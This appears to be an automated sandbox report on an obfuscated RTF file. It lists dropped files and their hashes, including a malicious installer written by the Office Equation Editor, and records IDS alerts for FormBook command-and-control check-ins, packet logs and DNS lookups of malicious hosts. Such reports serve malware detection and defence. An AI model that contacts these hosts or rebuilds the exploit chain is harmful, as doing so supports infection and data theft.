                                        Entropy (8bit):7.993649505823361
                                        Encrypted:true
                                        SSDEEP:3072:acHD+Nt+R1EsKRB+0nquZH07MVetuY+5ih/RYsQZU4AH+Ueh0Kw9BA+t/GG6gj:ae1Esaxt07jtufch/6HtyJe5GAI/X6i
                                        MD5:E5420CCC616B60691918C7AB170CD28E
                                        SHA1:3ECB4822670DA0E1989102FC3D21CB84AE377D3A
                                        SHA-256:07C2C358CB69396A7F7E0EBA42619181E0E3054C4D75FC4E81F3808B0B9DFC29
                                        SHA-512:6B98D963BE0C8B5A14A98D878384E2FFC4428E344FA5383E1733D6C089FF535146C9D15D73AF36379FAD1B4CF73FCB001E0146E0896213A4E653F1644AF236DE
                                        Malicious:false
                                        Preview:....f../..a...u.]...(L'......T6.....d]...[....J.......j....O....B..}.1......`...o...+.W...*...D]NR....%....B9Km..wY...y.....F.f....%..z2=...-.-..G.R...jZ}t..*.b.&S.qm...1A..`G..z.6....$..U0H....6v..mp....k..K..0..>'....\...G0....@.W..#..v.TA../...X1.P..;.*..<=.\.`Z.......]..v[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A........6.v..$.~.0j7....v..mY./x=.-.12..0..>'...%.-...(....2@....#..vH..TA../....X1.P..?.*..<=.\.JZT6.....d]...[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A..`G..z.6....$...0j.a..6v..mY./x=.-.K2..0..>'...%.-...(....2@....#..vH..TA../....X1.P..?.*..<=.\.JZT6.....d]...[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A..`G..z.6....$...0j.a..6v..mY./x=.-.K2..0..>'.

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Tue Nov 21 11:25:51 2023, length=3443, window=hide
                                        Category:dropped
                                        Size (bytes):1199
                                        Entropy (8bit):4.540809578612031
                                        Encrypted:false
                                        SSDEEP:24:8KbV/XTwdxO45HHyDJeNHHytDv3qEwk7N:8KbV/XTkd5HHeJuHHDEwiN
                                        MD5:279B3E83EA98BAFD8587081FAADFE3C2
                                        SHA1:5125E4FFF34256189E26CA141FE48DD7A6CE4B2C
                                        SHA-256:B8A1F272B088257F378124F90EE56AC1D9E6F9E3069386FCFBA92F7C27AA9D09
                                        SHA-512:DB97D748E4D8B51ABD54D5C74802C40A171792F26CF77D416A57120C8470E6BBFE69F73F004670C1FC8840BF1C732D4C41AA2363F196E5FB1A3F057CB5A2C4AA
                                        Malicious:false
                                        Preview:L..................F.... .......r.......r.....O.u...s............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WC...user.8......QK.X.WC.*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.s...uW:c .SECURI~1.RTF..........WC..WC.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...R.T.F...O.b.f.u.s.c.a.t.e.d.-.g.e.n...1.9.6.6.3...1.6.5.1.4...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop\SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...R.T.F...O.b.f.u.s.c.a.t.e.d.-.g.e.n...1.9.6.6.3...1.6.5.1.4...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):129
                                        Entropy (8bit):5.038678879902177
                                        Encrypted:false
                                        SSDEEP:3:H9rbJ12ZTAgRLp5om4P8bJ12ZTAgRLp5ov:H9rt12ZNd5jt12ZNd5y
                                        MD5:BFD257F822EF401F0FE69371316A0691
                                        SHA1:EDFFDCE568ECE72EC949B08E0A2F34E00EC91174
                                        SHA-256:429F327731ED96965057646D6731067881FC7B613BA254FA67B4754248819336
                                        SHA-512:0EDBACF16A845E9CB898900E8A3B6C990A938A8816F692EC2202A365F3191B1EFA489D09FFE60CEA4DFE4AC262F9C570CFF4AEC4C0B4ADEC08852B001E36418F
                                        Malicious:false
                                        Preview:[misc]..SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK=0..[folders]..SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK=0..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        C:\Users\user\AppData\Roaming\word.exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):345522
                                        Entropy (8bit):7.70573760188668
                                        Encrypted:false
                                        SSDEEP:6144:xBlL/8qFeJ/1IW4/DTgYKfHSAtiHbc2+x/D2LYTx0/BRtLuL3SqSY5dQVxS:X2qFWdIWQTgY2HSkiHbc2+5DLTKcxX
                                        MD5:B08C02AB269D1406728178E62017C3D4
                                        SHA1:DA33C4A1A8912C7D08CFB1BF77C59A813419BA64
                                        SHA-256:4169BC8EF83D44E5CD72DE2F88C40602F7840D578E1EC0BBDD9B2A874BB75C4C
                                        SHA-512:36516AB0FD27708F38CCEEBDE3AB532D3CAF57598D907A565828ABF999C7D798F5EA02CF99D6EC1F9A142158A22D7BF794D91221E68ED27965C6B509292C64CC
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................P...............................................t...........q...........................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc....q.......r...x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\Desktop\~$curiteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        Static File Info

                                        General

                                        File type:Rich Text Format data, version 1
                                        Entropy (8bit):4.135232264520108
                                        TrID:
                                        • Rich Text Format (5005/1) 55.56%
                                        • Rich Text Format (4004/1) 44.44%
                                        File name:SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
                                        File size:3'443 bytes
                                        MD5:db71e76c281983819c7259fd25618513
                                        SHA1:cfbeb69bdcf67546aafabb4dfe72ad4cbec77ec3
                                        SHA256:ddbd4b7c13d365eb339aad4d0e2deb0dff4b50287d5111f57ca8756f3746f940
                                        SHA512:6bc20e1a03fc37d5cbb74597fd694ae7a481c2c4d1a1fa10a54d66bc423538fc49022b65e534dfde1d9b29ecaf5db283733a12031f0d8890e0bbf81a03dc76bf
                                        SSDEEP:96:Of+TITOFimbXBrNKMnIRj2DhSUDmqNvmr:STOkmbRR3IgAUSqkr
                                        TLSH:39610BB947942CD2D893C4F0CA187CEA82B8F11782DEB551842CEC31197B12A7E7D982
                                        File Content Preview:{\rtf1.........{\*\bWModeBW549517209 \.}.{\296620781\object73414323\objlink92997226\objw5083\objh5169{\+\objupdate85292348529234\*\objdata51440{\*\fttruetype802692110 \bin00\499944563543248708}.{\qmspace689212854 \bin00\94374414930735523}.69ee3f0e02000000

                                        File Icon

                                        Icon Hash:2764a3aaaeb7bdbf

                                        Static RTF Info

                                        Objects

                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                        00000008Bhno

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.22103.224.247.21049161802021697 11/21/23-13:25:55.147417TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916180192.168.2.22103.224.247.210
                                        192.168.2.22107.164.111.10149165802031412 11/21/23-13:26:55.450467TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.22107.164.111.101
                                        192.168.2.223.33.130.19049166802031412 11/21/23-13:27:15.263664TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.223.33.130.190

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2023 13:25:54.770240068 CET4916180192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.136569023 CET8049161103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:55.136800051 CET4916180192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.147417068 CET4916180192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.514156103 CET8049161103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:55.514302969 CET4916180192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.593086958 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.593139887 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:55.593209982 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.609181881 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:55.609200954 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:56.730706930 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:56.730827093 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:56.735972881 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:56.735980034 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:56.736287117 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:56.736344099 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:56.867254972 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:56.913253069 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.605598927 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.605658054 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.605695963 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.605775118 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:57.608815908 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:57.608834028 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.608890057 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:57.611144066 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:57.972647905 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.972661018 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.972743988 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.972872972 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:57.972888947 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:57.972945929 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340131044 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340142012 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340229034 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340243101 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340261936 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340295076 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340303898 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340344906 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340357065 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340398073 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340420008 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340424061 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.340439081 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340457916 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.340631962 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341008902 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341048956 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341068029 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341072083 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341083050 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341103077 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341103077 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341156006 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341167927 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341208935 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341222048 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341226101 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.341254950 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341463089 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.341463089 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708019972 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708030939 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708070993 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708137035 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708153963 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708187103 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708187103 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708195925 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708206892 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708247900 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708247900 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708256006 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708261967 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708266973 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.708313942 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.708589077 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709309101 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709362030 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709379911 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709384918 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709410906 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709418058 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709492922 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709537029 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709548950 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709552050 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709587097 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709610939 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709753036 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709799051 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709809065 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709813118 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:58.709852934 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:58.709999084 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.075880051 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.075891018 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.075927973 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.075995922 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.075995922 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.076014042 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.076061964 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.076062918 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.077976942 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078015089 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078057051 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078057051 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078068972 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078080893 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078104019 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078135967 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078175068 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078197956 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078202963 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078221083 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078243017 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078305960 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078370094 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078413963 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078432083 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078435898 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078459024 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078474998 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078561068 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078603029 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078617096 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078620911 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078653097 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078717947 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078762054 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078772068 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078774929 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.078810930 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078823090 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078975916 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.078989983 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079026937 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079040051 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079044104 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079058886 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079078913 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079140902 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079176903 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079189062 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079191923 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079226971 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079284906 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079322100 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079329967 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079334021 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079371929 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079384089 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079555988 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079592943 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079603910 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079608917 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079637051 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079648018 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079654932 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079658985 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079689980 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079696894 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079699993 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079727888 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:25:59.079735994 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079767942 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.079942942 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.081475973 CET49162443192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:25:59.081491947 CET44349162103.224.247.210192.168.2.22
                                        Nov 21, 2023 13:26:00.464354992 CET4916180192.168.2.22103.224.247.210
                                        Nov 21, 2023 13:26:55.294487953 CET4916580192.168.2.22107.164.111.101
                                        Nov 21, 2023 13:26:55.450167894 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:55.450436115 CET4916580192.168.2.22107.164.111.101
                                        Nov 21, 2023 13:26:55.450467110 CET4916580192.168.2.22107.164.111.101
                                        Nov 21, 2023 13:26:55.606137037 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:56.648093939 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:56.648200989 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:56.648214102 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:56.648225069 CET8049165107.164.111.101192.168.2.22
                                        Nov 21, 2023 13:26:56.648513079 CET4916580192.168.2.22107.164.111.101
                                        Nov 21, 2023 13:26:56.648513079 CET4916580192.168.2.22107.164.111.101
                                        Nov 21, 2023 13:27:15.168286085 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.263226032 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:15.263430119 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.263664007 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.358530045 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:15.362652063 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:15.362664938 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:15.362915993 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.362915993 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.375228882 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:15.375420094 CET4916680192.168.2.223.33.130.190
                                        Nov 21, 2023 13:27:15.457813025 CET80491663.33.130.190192.168.2.22
                                        Nov 21, 2023 13:27:35.330826998 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:36.954817057 CET8049167103.150.181.71192.168.2.22
                                        Nov 21, 2023 13:27:36.955003023 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:36.955003023 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:41.824326038 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:27:51.543101072 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:10.996438980 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:30.511953115 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:28:49.980819941 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:29:28.871623993 CET4916780192.168.2.22103.150.181.71
                                        Nov 21, 2023 13:30:06.245902061 CET4916780192.168.2.22103.150.181.71

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2023 13:25:54.656249046 CET5291753192.168.2.228.8.8.8
                                        Nov 21, 2023 13:25:54.755660057 CET53529178.8.8.8192.168.2.22
                                        Nov 21, 2023 13:26:35.336592913 CET5482153192.168.2.228.8.8.8
                                        Nov 21, 2023 13:26:35.444792032 CET53548218.8.8.8192.168.2.22
                                        Nov 21, 2023 13:26:55.181051016 CET5471953192.168.2.228.8.8.8
                                        Nov 21, 2023 13:26:55.291516066 CET53547198.8.8.8192.168.2.22
                                        Nov 21, 2023 13:27:15.067967892 CET4988153192.168.2.228.8.8.8
                                        Nov 21, 2023 13:27:15.167404890 CET53498818.8.8.8192.168.2.22
                                        Nov 21, 2023 13:27:35.102672100 CET5499853192.168.2.228.8.8.8
                                        Nov 21, 2023 13:27:35.330076933 CET53549988.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 21, 2023 13:25:54.656249046 CET192.168.2.228.8.8.80x73d6Standard query (0)swamini.inA (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:26:35.336592913 CET192.168.2.228.8.8.80x622aStandard query (0)www.allamericanshuttlellc.comA (IP address)IN (0x0001)false
